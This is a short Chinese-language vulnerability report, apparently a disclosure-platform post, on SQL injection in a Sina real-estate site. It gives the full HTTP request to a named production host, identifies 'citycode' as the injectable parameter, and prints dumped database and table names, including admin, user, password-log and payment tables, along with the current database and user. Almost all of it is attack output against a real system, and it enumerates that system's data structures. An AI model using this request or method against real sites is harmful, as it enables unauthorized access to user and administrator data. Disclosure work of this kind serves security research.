新浪某站MySQL注射（支持三种查询/全城市站点数据/管理员数据）

GET /di/positioncommunity/?citycode=cd&x=104.03249595349092&y=30.607376004698764&callback=jsonp4&_=1461490791828 HTTP/1.1
 Host: cd.esf.sina.com.cn
 Connection: close
 Accept: */*
 User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13E238 KoudailejuApp
 Accept-Language: zh-cn
 Referer: http://m.leju.com/touch/esf/cd?ln=ljmf_h5&source=ios&s=yd_kdlj
 Accept-Encoding: gzip, deflate

注入参数#citycode

[*] information_sch
 [*] mysql
 [*] performance_sch
 [*] shop_admin
 [*] shop_anshan
 [*] shop_bt
 [*] shop_cc
 [*] shop_cd
 [*] shop_cq
 [*] shop_cs
 [*] shop_cz
 [*] shop_dg
 [*] shop_dl
 [*] shop_fs
 [*] shop_fushun
 [*] shop_fz
 [*] shop_gg
 [*] shop_gl
 [*] shop_gy
 [*] shop_gz
 [*] shop_haikou
 [*] shop_heb
 [*] shop_hf
 [*] shop_hhht
 [*] shop_huizhou
 [*] shop_hz
 [*] shop_jn
 [*] shop_km
 [*] shop_ks
 [*] shop_lanzhou
 [*] shop_lw
 [*] shop_nb
 [*] shop_nc
 [*] shop_nj
 [*] shop_nn
 [*] shop_nt
 [*] shop_qd
 [*] shop_qhd
 [*] shop_sanya
 [*] shop_sh
 [*] shop_sjz
 [*] shop_suzhou
 [*] shop_sy
 [*] shop_sz
 [*] shop_tangshan
 [*] shop_ty
 [*] shop_weifang
 [*] shop_weihai
 [*] shop_wh
 [*] shop_wlmq
 [*] shop_wuhu
 [*] shop_wx
 [*] shop_xian
 [*] shop_xm
 [*] shop_xz
 [*] shop_yangzhou
 [*] shop_yinchuan
 [*] shop_yt
 [*] shop_zb
 [*] shop_zhengzhou
 [*] shop_zhongshan
 [*] shop_zhuhai
 [*] shop_zz
 [*] test

ad_list
 ad_name
 ad_time
 community_distanceset
 community_distanceset
 community_stype
 community_stype_set
 community_stype_set_l
 count_house_avgprice
 dict_districtblock
 dict_districtblock_me
 es_home_compare
 es_home_spider
 es_pinzhuan_keyword
 es_pinzhuan_keyword_w
 es_pinzhuan_status
 esf_acl_access
 esf_acl_role
 esf_acl_role_access
 esf_acl_user
 esf_acl_user_role
 esf_city_price
 esf_delegate_agent
 esf_delegate_house
 esf_delegate_pic
 esf_home_apply
 esf_home_fangjia
 esf_home_info
 esf_home_info_ext
 esf_home_info_tmp_jia
 esf_home_jiaju
 esf_home_othername
 esf_home_pic_fx
 esf_home_pic_xq
 esf_home_pinzhuan
 esf_home_price
 esf_home_relation
 esf_home_score
 esf_home_setting
 esf_home_subway
 esf_home_transfer
 esf_home_user
 esf_home_usertop
 esf_home_weixin
 esf_home_zhida
 esf_house_chuchuang
 esf_house_rzassign
 esf_house_rzassign_lo
 esf_house_rzassign_us
 esf_house_tag
 esf_house_urlwhite
 esf_shop_house
 esf_shop_house_assign
 esf_shop_house_pic
 esf_sitemap
 esf_smsout
 esf_user_helperpic
 esf_user_mainhome
 esf_user_shop
 esf_weixin_log
 esf_weixin_menu
 esf_weixin_passport
 esf_weixin_passport2
 esf_weixin_subscribe
 esf_weixin_subscribe_
 esf_weixin_ticket
 esf_weixin_ticket_use
 esf_weixin_user
 fnj_agent
 job_distribute
 job_log
 mobile_pocketagent_bo
 mobile_sendmessage_lo
 push_data_log
 sp_agentphone
 sp_lime
 sp_log
 sp_member
 sp_notice
 sp_pay_log
 sp_permission
 sp_pwd_log
 sp_role
 sp_role_permission
 sp_sys_user
 sp_sys_userpermission
 sp_user
 sp_user_bj
 sp_user_del_log
 sp_user_ext
 sp_user_ext_sh
 sp_user_loginlog
 sp_user_pic
 sp_user_sh
 sp_weixin_log
 sp_weixin_user
 test

当前数据库：'shop_admin'
 
 当前数据库用户：'%'